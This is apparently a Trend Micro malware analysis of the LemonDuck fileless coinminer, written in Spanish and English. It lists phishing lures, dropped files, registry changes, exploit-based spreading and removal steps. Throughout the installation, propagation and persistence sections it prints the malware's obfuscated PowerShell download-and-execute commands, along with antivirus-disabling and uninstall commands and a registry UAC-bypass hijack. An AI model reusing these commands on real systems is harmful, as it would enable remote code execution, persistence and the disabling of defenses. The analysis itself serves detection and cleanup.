Fileless.LEMONDUCK

Publish date: 06 de mayo de 2021

Análisis realizado por : Arianne Grace Dela Cruz

Alias

Trojan-Dropper.PowerShell.Compressed.b (KASPERSKY); Trojan.PowerShell.Crypt (IKARUS)

Plataforma:

Windows, Linux

Riesgo general:

Potencial de destrucción:

Potencial de distribución:

Infección divulgada:

Revelación de la información:

Bajo

Medio

High

Crítico

Tipo de malware
Coinminer
Destructivo?
No
Cifrado
No
In the Wild:
Sí

Resumen y descripción

Canal de infección Se envía como spam vía correo electrónico, Se propaga vía vulnerabilidades de software

Llega como archivo adjunto a los mensajes de correo que otro malware/grayware/spyware o usuarios maliciosos envían como spam.

Aprovecha las vulnerabilidades del software para propagarse a otros equipos de la red.

Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.

Recopila determinada información del equipo afectado.

Detalles técnicos

Tamaño del archivo 3,845 bytes

Tipo de archivo PS1

Residente en memoria No

Fecha de recepción de las muestras iniciales 28 de abril de 2021

Carga útil Encrypts files, Collects system information, Connects to URLs/IPs, Downloads files, Drops files

Detalles de entrada

Llega como un archivo adjunto a los mensajes de correo electrónico siguiente correo basura por otro malware / grayware / spyware o usuarios maliciosos:

Where Email Subject - Message Body can be any of the following combinations:
- The Truth of COVID-19 - Virus actually comes from United States of America
- COVID-19 nCov Special info WHO - very important infomation for Covid-19 see attached document for your action and discretion.
- HALTH ADVISORY:CORONA VIRUS - the outbreak of CORONA VIRUS is cause of concern especially where forign personal have recently arrived or will be arriving at various intt in near future. see attached document for your action and discretion.
- WTF - what's wrong with you?are you out of your mind!!!!!
- What the fcuk - are you out of your mind!!!!!what 's wrong with you?
- good bye - good bye, keep in touch
- farewell letter - good bye, keep in touch
- broken file - can you help me to fix the file,i can't read it
- This is your order? - file is brokened, i can't open it

Instalación

Infiltra los archivos siguientes:

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data - serves as infection marker
Some LemonDuck variants deployed via the ProxyLogon vulnerability can drop the following files:
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
- %System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx - Chopper Webshell

(Nota: %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

)

Infiltra y ejecuta los archivos siguientes:

%User Temp%\tt.vbs - install scheduled task to execute kk4kk.log (detected as HackTool.Win32.Mpacket.SM)
%System%\WindowsPowerShell\v1.0\{Random}.exe - legitimate copy of Powershell.exe

(Nota: %User Temp% es la carpeta Temp del usuario activo, que en el caso de Windows 2000(32-bit), XP y Server 2003(32-bit) suele estar en C:\Documents and Settings\{nombre de usuario}\Local Settings\Temp y en el case de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Local\Temp).

. %System% es la carpeta del sistema de Windows, que en el caso de Windows 98 y ME suele estar en C:\Windows\System, en el caso de Windows NT y 2000 en C:\WINNT\System32 y en el caso de Windows 2000(32-bit), XP, Server 2003(32-bit), Vista, 7, 8, 8.1, 2008(64-bit), 2012(64bit) y 10(64-bit) en C:\Windows\System32).

)

Agrega los procesos siguientes:

cmd /c start /b notepad "+{Malware file name}+" & powershell -w hidden IE`x(Ne`w-Obj`ect Net.WebC`lient).DownLoadString('{Download URL}7p.php?0.7*mail_js*%username%*%computername%*'+[Environment]::OSVersion.version.Major);bpu ('{Download URL}mail.jsp?js_0.7')"
cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden
ComputerDefaults.exe - if ran in Windows 10
CompMgmtLauncher.exe - if ran in other OS
To uninstall antivirus related programs:
- cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
- cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
- cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
To open ports:
- cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
- netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53
- netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
- netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
cmd.exe /c echo try{$localKr=$flase;New-Object Threading.Mutex($true,'Global\eLocalKr',[ref]$localKr)}catch{};$ifmd5='9f9075b6db0089161c96cabf65974fa3';$ifp=$env:tmp+'\kr.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/kr.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
cmd.exe /c echo try{$localIf=$flase;New-Object Threading.Mutex($true,'Global\eLocalIf',[ref]$localIf)}catch{};$ifmd5='144f3ede7ec9d604a58113fc91a246d1';$ifp=$env:tmp+'\if.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/if.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines:
- cmd.exe /c echo try{$localTMn=$flase;New-Object Threading.Mutex($true,'Global\elocalTMn',[ref]$localKr)}catch{};$ifmd5='4001ba98a424fdb63047a23af97ec590';$ifp=$env:tmp+'\m6.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
For 64bit machines and video card is any of the following: {GTX, NVIDIA, GEFORCE, Radeon, AMD}
- cmd.exe /c echo try{$localTMng=$flase;New-Object Threading.Mutex($true,'Global\elocalTMng',[ref]$localKr)}catch{};$ifmd5='a921b532d5d239e4a2e71e5f853195cd';$ifp=$env:tmp+'\m6g.bin';$down_url='{Download URL}';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)^^^|foreach{$s+=$_.ToString('x2')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+'/m6g.bin?^^^&{Computer Name}^^^&{Gathered information}^^^&{MAC Address}');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}I`EX(-join[char[]]$con)|{Random}.exe -
Some variants of LemonDuck execute the following:
- Add users and local groups:
- Delete AV related firewall rules:
- Delete AV related services:
- powershell.exe -psconsolefile "$env:exchangeinstallpath\bin\exshell.psc1" -command "New-ManagementRoleAssignment –Role 'Mailbox Import Export' –User netcat"
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
- wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1

)

Crea las carpetas siguientes:

Variants of LemonDuck deployed via ProxyLogon Vulnerability can create the following folders:
- %System%\inetpub\wwwroot\aspnet_client\js\demo
- {Exchange server installation path}\Frontend\HttpProxy\ecp\auth\js\demo

)

Otras modificaciones del sistema

Modifica las siguientes entradas de registro:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Services\LanmanServer\Parameters
DisableCompression = 1

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
ms-settings\shell\open\
command
(default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
DelegateExecute = {Null}

HKEY_CURRENT_USER\Software\Classes\
mscfile\shell\open\
command
(default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')

Propagación

Aprovecha las vulnerabilidades de software siguientes para propagarse a otros equipos de la red:

SMB request - Eternal Blue Exploit (CVE-2017-0144)
- Upon exploitation, it may perform the following:
  - Execute the following command: cmd /c schtasks /create /ru system /sc MINUTE /mo 120 /tn Rtsa /tr "powershell -c '\\"{Download URL 1}\\",\\"{Download URL 2}\\",\\"{Download URL 2}\\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\\"DownloadString\\"(\\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\\")}'" /F & echo %path%|findstr /i powershell>nul || (setx path "%path%;c:\windows\system32\WindowsPowershell\v1.0" /m) & schtasks /run /tn Rtsa
  - Install the following scheduled task:
SMBGhost vulnerability
- Upon exploitation, it executes the following command:
RDP Brute-Forcing
SSH brute-forcing
- Upon exploitation, it may execute the following:
Pass-the-hash Attack
- Uses PowerDump module and Mimikatz to dump Username, password, NTLM hashes, and domain information of the target machine.
MS-SQL brute-forcing
- Upon successful brute-forcing, it will add a malware detected as HackTool.Win32.EvilCLR.YXBCIA to the database server to enable the execution of the following: "powershell.exe iex(new-object net.webclient).downloadstring('{Download URL}/if.bin?once')"
- It scans for vulnerable MS-SQL port 1433. Upon exploitation, it will execute the following commands:
Redis remote command
- Upon scanning for vulnerable port 6379, 16379, it may perform the following command:
Yarn remote command
- Upon scanning for vulnerable port 8088, it may perform the following command:
Logic Port Scan
- Upon scanning for vulnerable port 7001, it may perform the following command:
Vulnerable networks in port 445
- Upon exploiting vulnerable networks connecting to port 445, it does the following:

. %User Startup% es la carpeta Inicio del usuario activo, que en el caso de Windows 98 y ME suele estar en C:\Windows\Profiles\{nombre de usuario}\Menú Inicio\Programas\Inicio, en el caso de Windows NT en C:\WINNT\Profiles\{nombre de usuario}\Menú Inicio\Programas\Inicio, en el caso de Windows 2003(32-bit), XP y 2000(32-bit) en C:\Documents and Settings\{nombre de usuario}\Menú Inicio\Programas\Inicio y en en el caso de Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) y 10(64-bit) en C:\Users\{nombre de usuario}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup).

)

Finalización del proceso

Finaliza los servicios siguientes si los detecta en el sistema afectado:

.Net CLR
\gm
360rTys
ALGM
aspnet_staters
AxInstSV
ClipBooks
CLR
clr_optimization
DNS Server
ExpressVNService
IPSECS
lsass
Microsoft
Microsoft Telemetry
MpeSvc
mssecsvc2.0
mssecsvc2.1
Natimmonal
Nationaaal
National
Nationalaie
Nationalmll
Nationaloll
Nationalwpi
NetMsmqActiv Media NVIDIA
Oracleupdate
RpcEptManger
Samserver
Serhiez
Sncryption Media Playeq
Sougoudl
SRDSL
SuperProServer
SvcNlauser
SVSHost
SxS
sysmgt
system
taskmgr1
WebServers
WifiService
Windows Managers
Windows_Update
WinHasdadelp32
WinHasdelp32
WinHelp32
WinHelp64
WinHelpSvcs
WinSvc
WinVaultSvc
WissssssnHelp32
WmdnPnSN
wmiApServs
wmiApSrvs
WWW.{BLOCKED}S.CN.COM
Xtfy
Xtfya
Xtfyxxx
xWinWpdSrv
Zational

Finaliza procesos o servicios que contienen una de las cadenas siguientes si detecta que se ejecutan en la memoria del sistema afectado:

360
8866
9696
9797
9966
auto-upgeade
Avira
Calligrap
cara
Carbon
carss
cohernece
conhoste
csrsc
DW20
explores
Galligrp
gxdrv
Imaging
javaupd
lsmosee
minerd
MinerGate
msinfo
ress
SC
SearchIndex
secuams
service
Setring
Setting
Sqlceqp
SQLEXPRESS_X64_86
SQLforwin
svchosti
svshost
SystemIIS
SystemIISSec
taskegr
taskmgr1
Terms.EXE
Uninsta
update
upgeade
WerFault
WerMgr
win
WindowsDefender*
WindowsUpdater*
Workstation
xig*
XMR*
xmrig*
yamm1
360bdoctor.exe
360rp.exe
360rps.exe
360safe_cq.exe
360safe_se.exe
360sd.exe
360speedld.exe
360Tray.exe
360LogCenter.exe
360tray.exe
360speedld.exe
360se.exe

Rutina de infiltración

Se aprovecha de las siguientes vulnerabilidades de software para crear archivos maliciosos:

Windows LNK Remote Code Execution Vulnerability (CVE-2017-8464) - Dropped in removable drives to allow execution of remote commands.

Rutina de descarga

Guarda los archivos que descarga con los nombres siguientes:

%User Temp%\m6.bin - Modified XMRig for 64bit Machines
%User Temp%\m6g.bin - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\kr.bin - Kill Competitions Module
%User Temp%\if.bin - Propagation and Exploitation Module
%User Temp%\if_mail.bin - Email Spreader Module
%User Temp%\ode.bin - Downloads PowerSploit module and create scheduled task
%User Temp%\nvd.zip - Coinminer for 64bit Machines and video card name has the one of the following strings:"GTX","NVIDIA","GEFORCE","Radeon","AMD"
%User Temp%\mimi.dat - Mimikatz module
Modules for Process Termination, Task and WMI installation:
- %User Temp%\mso.jsp
- %User Temp%\ms.jsp
- %User Temp%\rdp.jsp
- %User Temp%\rdpo.jsp
- %User Temp%\smgh.jsp
- %User Temp%\smgho.jsp
- %User Temp%\logic.jsp
- %User Temp%\logico.jsp

)

Después ejecuta los archivos descargados. Como resultado, en el sistema afectado se muestran las rutinas maliciosas de los archivos descargados.

Robo de información

Recopila la siguiente información del equipo afectado:

Machine Type (32bit or 64bit)
Computer Name
Product UUID
Mac Address
Operating system
User name
Machine Domain
System uptime
Video Controller name
Physical memory
Drive information:
- Drive Type
- Free space
- Drive format
Time stamp
JavaScript information on localhost
Host Name
Coinminer version - if a coinminer is present
Ip address - if a coinminer is present
Total hashrate - if a coinminer is present
First 6 bytes of md5 hashes of malicious files

Otros detalles

Hace lo siguiente:

It adds the following Windows Management
Infection Marker:

__EventFilter

Name: blackball

Persistence:

__EventFilter

Name: {Random}

CommandLineEventConsumer

Name: {Random}
Command: powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect
__FilterToConsumerBinding

It disables Windows Defender Real Time Monitoring. It excludes Powershell.exe running in C:\ directory in Windows
http://t.{BLOCKED}g.com
http://t.{BLOCKED}9.com
http://t.{BLOCKED}x.com
http://t.{BLOCKED}q.com
http://d.{BLOCKED}p.com
http://t.{BLOCKED}1.com
http://t.{BLOCKED}0.com
http://down.{BLOCKED}cat.com
http://t.{BLOCKED}kit.com
http://t.{BLOCKED}kit.com
http://d.{BLOCKED}g.com
http://p.{BLOCKED}q.com
http://lplp.{BLOCKED}g.com
http://w.{BLOCKED}0.com
http://info.{BLOCKED}x.com
http://info.{BLOCKED}g.com
http://info.{BLOCKED}0.com
http://t.{BLOCKED}q.top
http://p.{BLOCKED}a.com
http://t.{BLOCKED}2.com
http://t.{BLOCKED}q.com
http://ps2.{BLOCKED}ihua
http://t.{BLOCKED}n.com
http://t.{BLOCKED}r.cc
http://t.{BLOCKED}0.sh
http://t.{BLOCKED}cat.co
http://d.{BLOCKED}8.ag
{BLOCKED}.{BLOCKED}.154.202
{BLOCKED}.{BLOCKED}.7.85
{BLOCKED}.{BLOCKED}.43.37
{BLOCKED}.{BLOCKED}.225.82
{BLOCKED}.{BLOCKED}.107.193
{BLOCKED}.{BLOCKED}.80.221
{BLOCKED}.{BLOCKED}.183.160
{BLOCKED}.{BLOCKED}.188.255
{BLOCKED}.{BLOCKED}.158.207

Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

It will only modify "HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command" if the OS is Windows 10. Otherwise, the registry "HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command" will be modified.
It deletes the following scheduled tasks:
- /Rtsa
- /Rtsa1
- /Rtsa2
- AdobeFlashPlayer
- Bluetooths
- Credentials
- Ddrivers
- DNS
- DnsCore
- DnsCore
- DnsScan
- ECDnsCore
- Flash
- FlashPlayer1
- FlashPlayer2
- FlashPlayer3
- gm
- GooglePingConfigs
- HispDemorn
- HomeGroupProvider
- IIS
- LimeRAT-Admin
- Microsoft Telemetry
- Miscfost
- MiscfostNsi
- my1
- Mysa
- Mysa1
- Mysa2
- Mysa3
- Netframework
- ngm
- ok
- Oracle Java
- Oracle Java Update
- Oracle Products Reporter
- RavTask
- skycmd
- Sorry
- Spooler SubSystem Service
- System Log Security Check
- SYSTEM"qPt,"DNS2
- SYSTEMa
- TablteInputout
- Update
- Update qPtservice for Windows Service
- Update service for products
- Update_windows
- Update1
- Update2
- Update3
- Update4
- WebServers
- werclpsyport
- Windows_Update
- WindowsLogTasks
- WindowsUpdate1
- WindowsUpdate2
- WindowsUpdate3
- WwANsvc
It check the presence of Outlook and Outlook\Security in the following registry keys:
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Office
- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office
If present, it will modify the registry entry:
{Registry Key from list above}
ObjectModelGuard = 2
It uses any of the following {Download URL} to send gathered information, as well as download related modules:
- http://t.{BLOCKED}9.com
It sets the machine's DNS server to Google (8.8.8.8 or 9.9.9.9)
It uses the following credentials for brute-forcing:
- Username:
- Passwords:
- NTLM Hashes:
It sends copies of itself as zip attachment to email addresses gathered from the victim machine's Outlook contacts, inbox and sent items. It would delete the emails it sent from the sent items folder.
It tries to connect to the named pipe \.\pipe\HHyeuqi7\ and execute its email propagation module.
It terminates processes connecting to the following domains:
- pg.{BLOCKED}q.com
- p.{BLOCKED}q.com
- pg.{BLOCKED}4.com
- p.{BLOCKED}4.com
- lplp.{BLOCKED}g.com
It terminates processes that established a TCP connection to the following ports:
- 1111
- 2222
- 3333
- 4444
- 5555
- 6666
- 7777
- 8888
- 9999
- 14433
- 14444
- 43669
- 43668
- 45560
- 65333

Soluciones

Motor de exploración mínimo 9.800

Primer archivo de patrones de VSAPI 15.932.08

Primera fecha de publicación de patrones de VSAPI 07 de mayo de 2020

Versión de patrones OPR de VSAPI 15.933.00

Fecha de publicación de patrones OPR de VSAPI 08 de mayo de 2020

Step 1

Los usuarios de Windows ME y XP, antes de llevar a cabo cualquier exploración, deben comprobar que tienen desactivada la opción Restaurar sistema para permitir la exploración completa del equipo.

Step 2

Note that not all files, folders, and registry keys and entries are installed on your computer during this malware's/spyware's/grayware's execution. This may be due to incomplete installation or other operating system conditions. If you do not find the same files/folders/registry information, please proceed to the next step.

Step 3

Reiniciar en modo seguro

[ aprenda más ]

Step 4

Restore this modified registry value

[ aprenda más ]

Important: Editing the Windows Registry incorrectly can lead to irreversible system malfunction. Please do this only if you know how to or you can seek your system administrator’s help. You may also check out this Microsoft article first before modifying your computer's registry.

In HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
- DisableCompression = 1
- DisableCompression = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\ms-settings\shell\open\command
- (default) = cmd /c echo Set-MpPreference -DisableRealtimeMonitoring 1;Add-MpPreference -ExclusionPath c:\;Add-MpPreference -ExclusionProcess %System%\WindowsPowerShell\v1.0\powershell.exe|powershell -w hidden & Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- DelegateExecute = {Null}
- DelegateExecute = {Default}
In HKEY_CURRENT_USER\Software\Classes\mscfile\shell\open\command
- (default) = cmd /c powershell -w hidden Iex(new-object net.webclient).downloadstring('"+{Download URL}+"?$env:username*$env:computername*$ver')
- (default) = {Default}
- {Registry Key in Outlook\Security in the list mentioned}
- ObjectModelGuard = 2
- ObjectModelGuard = {Default}

Step 5

Deleting Scheduled Tasks

The following {Task Name} - {Task to be run} listed should be used in the steps identified below:

Rtsa - \"{Download URL 1}\",\"{Download URL 2}\",\"{Download URL 2}\"|foreach{I`EX(Ne`w-Obj`ect Net.WebC`lient).\"DownloadString\"(\"http://$_/ebo.jsp?0.9*$env:username*$env:computername\")}"
blackball - blackball
{random} - powershell -w hidden -c function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String('{Base64 encoded command}');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url='{Download URL}';a($url+'/a.jsp?mail_20210428?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))

For Windows 2000, Windows XP, and Windows Server 2003:

Open the Windows Scheduled Tasks. Click Start>Programs>Accessories>
System Tools>Scheduled Tasks.
Locate each {Task Name} values listed above in the Name column.
Right-click on the said file(s) with the aforementioned value.
Click on Properties. In the Run field, check for the listed {Task to be run}.
If the strings match the list above, delete the task.

For Windows Vista, Windows 7, Windows Server 2008, Windows 8, Windows 8.1, and Windows Server 2012:

Open the Windows Task Scheduler. To do this:
• On Windows Vista, Windows 7, and Windows Server 2008, click Start, type taskschd.msc in the Search input field, then press Enter.
• On Windows 8, Windows 8.1, and Windows Server 2012, right-click on the lower left corner of the screen, click Run, type taskschd.msc, then press Enter.
In the left panel, click Task Scheduler Library.
In the upper-middle panel, locate each {Task Name} values listed above in the Name column.
In the lower-middle panel, click the Actions tab. In the Details column, check for the {Task to be run} string.
If the said string is found, delete the task.

Step 6

Buscar y eliminar estos archivos

[ aprenda más ]

Puede que algunos de los archivos del componente estén ocultos. Asegúrese de que tiene activada la casilla Buscar archivos y carpetas ocultos en la opción "Más opciones avanzadas" para que el resultado de la búsqueda incluya todos los archivos y carpetas ocultos.

{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat

DATA_GENERIC_FILENAME_1

En la lista desplegable Buscar en, seleccione Mi PC y pulse Intro.

Una vez haya encontrado el archivo, selecciónelo y, a continuación, pulse MAYÚS+SUPR para eliminarlo definitivamente.

Repita los pasos 2 a 4 con el resto de archivos:
{Removable/Network Drive name}\Dblue3.lnk
{Removable/Network Drive name}\Eblue3.lnk
{Removable/Network Drive name}\Fblue3.lnk
{Removable/Network Drive name}\Gblue3.lnk
{Removable/Network Drive name}\Hblue3.lnk
{Removable/Network Drive name}\Iblue3.lnk
{Removable/Network Drive name}\Jblue3.lnk
{Removable/Network Drive name}\Kblue3.lnk
{Removable/Network Drive name}\Dblue6.lnk
{Removable/Network Drive name}\Eblue6.lnk
{Removable/Network Drive name}\Fblue6.lnk
{Removable/Network Drive name}\Gblue6.lnk
{Removable/Network Drive name}\Hblue6.lnk
{Removable/Network Drive name}\Iblue6.lnk
{Removable/Network Drive name}\Jblue6.lnk
{Removable/Network Drive name}\Kblue6.lnk
{Removable/Network Drive name}\readme.js
{Removable/Network Drive name}\UTFsync\inf_data
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt
%System%\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx
%User Temp%\tt.vbs
%User Temp%\m6.bin
%User Temp%\m6g.bin
%User Temp%\kr.bin
%User Temp%\if.bin
%User Temp%\if_mail.bin
%User Temp%\ode.bin
%User Temp%\nvd.zip
%User Temp%\mimi.dat
%User Temp%\mso.jsp
%User Temp%\ms.jsp
%User Temp%\rdp.jsp
%User Temp%\rdpo.jsp
%User Temp%\smgh.jsp
%User Temp%\smgho.jsp
%User Temp%\logic.jsp
%User Temp%\logico.jsp
{Malware Path}\dn.ps1
{Malware Path}\m6.exe
{Malware Path}\svchost.dat

Step 7

Reinicie en modo normal y explore el equipo con su producto de Trend Micro para buscar los archivos identificados como Fileless.LEMONDUCK En caso de que el producto de Trend Micro ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no serán necesarios más pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta página de Base de conocimientos para obtener más información.

Rellene nuestra encuesta!

Fileless.LEMONDUCK

Resumen y descripción

Detalles técnicos

Soluciones

Recursos

Soporte

Acerca de Trend

Oficina Principal en el País

Fileless.LEMONDUCK

Resumen y descripción

Detalles técnicos

Soluciones

Recursos

Soporte

Acerca de Trend

